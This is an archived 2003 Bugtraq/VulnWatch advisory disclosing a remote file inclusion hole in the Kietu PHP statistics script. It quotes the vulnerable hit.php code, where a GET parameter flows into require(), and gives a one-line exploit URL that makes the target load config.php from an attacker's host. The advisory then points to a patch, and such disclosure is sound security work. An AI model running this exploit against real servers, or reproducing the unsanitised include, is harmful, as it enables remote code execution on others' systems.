[VulnWatch] Kietu ( PHP )

• Previous message: Frog Man: "[VulnWatch] DotBr (PHP)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sat, 15 Feb 2003 10:38:40 +0100

Informations :
°°°°°°°°°°°°°°
Website : http://kietu.free.fr
Version : 2.0, 2.3
Problem : Include file

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
hit.php :
------------------------------------------------------------------
if (!get_cfg_var("register_globals")) {
$kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"];
$kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"];
$kietu["website"] = $HTTP_GET_VARS["website"];
$kietu["appel"] = $HTTP_GET_VARS["appel"];
$kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"];
$kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"];
$kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit;
}
else {
$kietu["remote_addr"] = $REMOTE_ADDR;
$kietu["http_user_agent"] = $HTTP_USER_AGENT;
$kietu["website"] = $website;
$kietu["appel"] = $appel;
$kietu["http_referer"] = $HTTP_REFERER;
$kietu["php_self"] = $PHP_SELF;
$kietu["url_hit"] = $url_hit;
}

require ($kietu["url_hit"]."config.php");
------------------------------------------------------------------

Exploit :
°°°°°°°°°
http://[target]/hit.php?url_hit=http://[attacker]/
with :
http://[attacker]/config.php

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools2:32:34 +0100 (CET)

This hole was published in "the Hackademy Journal 01", october 2002
(http://www.dmpfrance.com).

frog-m@n

_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.fr.msn.be

• Next message: Frog Man: "[VulnWatch] D-Forum (PHP)"
• Previous message: Frog Man: "[VulnWatch] DotBr (PHP)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Web Server Creator - Web Portal 0.1 (PHP) ... Website: http://webcreator.com02.com ... PHP Code/Location: ... le moteur de recherche qui pense comme vous! ... (Bugtraq) Kietu ( PHP ) ... Website: http://kietu.free.fr ... le moteur de recherche qui pense comme vous! ... (Bugtraq) Pentium 100Mhz New User ... sure to configure my computer correclty. ... le moteur de recherche qui pense comme vous! ... (Debian-User) Re: quota disk with redhat8 ... there are 2 quota formats, an old one and a new one ... le moteur de recherche qui pense comme vous! ... (RedHat)